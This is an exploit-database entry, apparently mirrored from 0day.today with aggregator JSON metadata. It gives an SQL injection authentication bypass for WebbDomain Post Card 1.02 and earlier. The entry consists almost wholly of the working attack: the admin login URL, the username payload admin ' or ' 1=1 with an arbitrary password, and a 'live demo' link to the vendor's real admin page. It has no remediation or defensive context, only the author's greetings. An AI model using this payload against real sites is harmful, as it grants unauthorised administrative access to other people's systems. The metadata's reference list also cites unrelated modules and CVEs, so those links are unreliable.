ID 1337DAY-ID-4066
Type zdt
Reporter x0r
Modified 2008-11-04T00:00:00
Description
Exploit for unknown platform in category web applications
=============================================================
WEBBDOMAIN Post Card <= 1.02 (SQL Injection) Auth Bypass Vuln
=============================================================
-==============================-
Autore: x0r - Road Crew
Cms: WebbDomain Web Postcards
Bug: Auth ByPass
Site Of Seller: http://webbdomain.com
-==============================-
Exploit: http://webbdomain.com/php/postcarden/admin
Username: admin ' or ' 1=1
Pass: x0r
Live Demo: http://webbdomain.com/php/postcarden/admin/admin.php
Greetz: La Mia Bimb4...8\10\08 Ti AmO
# 0day.today [2018-01-11] #
{"id": "1337DAY-ID-4066", "lastseen": "2018-01-11T05:37:12", "viewCount": 3, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 4.9, "vector": "NONE", "modified": "2018-01-11T05:37:12", "rev": 2}, "dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/MISC/WEBDAV_DELIVERY", "MSF:ENCODER/X64/XOR_CONTEXT", "MSF:EXPLOIT/MULTI/HTTP/WP_RESPONSIVE_THUMBNAIL_SLIDER_UPLOAD", "MSF:EXPLOIT/UNIX/LOCAL/EMACS_MOVEMAIL", "MSF:EXPLOIT/QNX/QCONN/QCONN_EXEC", "MSF:EXPLOIT/UNIX/SONICWALL/SONICWALL_XMLRPC_RCE"]}, {"type": "cve", "idList": ["CVE-2018-4066"]}, {"type": "threatpost", "idList": ["THREATPOST:4659C6740BE64D50B985F32560628891", "THREATPOST:142DAF150C2BF9EB70ECE95F46939532"]}, {"type": "ics", "idList": ["ICSA-19-122-03"]}, {"type": "zdt", "idList": ["1337DAY-ID-32610", "1337DAY-ID-29600"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:152651", "PACKETSTORM:146038"]}, {"type": "talosblog", "idList": ["TALOSBLOG:D359C8798DB4F71E8813CE20072A5C76"]}, {"type": "talos", "idList": ["TALOS-2018-0751"]}, {"type": "nessus", "idList": ["OTRS_OSA_2017_09.NASL", "FREEBSD_PKG_CEBD05D6ED7B11E795F2005056925DB4.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:43853"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B84599E7C11EA9A0836F904B3BA8E2D0"]}], "modified": "2018-01-11T05:37:12", "rev": 2}, "vulnersScore": 4.9}, "type": "zdt", "sourceHref": "https://0day.today/exploit/4066", "description": "Exploit for unknown platform in category web applications", "title": "WEBBDOMAIN Post Card <= 1.02 (SQL Injection) Auth Bypass Vuln", "cvelist": [], "sourceData": "=============================================================\r\nWEBBDOMAIN Post Card <= 1.02 (SQL Injection) Auth Bypass Vuln\r\n=============================================================\r\n\r\n\r\n-==============================-\r\n Autore: x0r - Road Crew \r\nCms: WebbDomain Web Postcards\r\nBug: Auth ByPass \r\nSite Of Seller: http://webbdomain.com\r\n -==============================- \r\nExploit: http://webbdomain.com/php/postcarden/admin\r\n\r\nUsername: admin ' or ' 1=1 \r\nPass: x0r \r\n\r\nLive Demo: http://webbdomain.com/php/postcarden/admin/admin.php\r\n \r\nGreetz: La Mia Bimb4...8\\10\\08 Ti AmO \r\n\r\n\r\n\n# 0day.today [2018-01-11] #", "published": "2008-11-04T00:00:00", "references": [], "reporter": "x0r", "modified": "2008-11-04T00:00:00", "href": "https://0day.today/exploit/description/4066", "immutableFields": []}
{}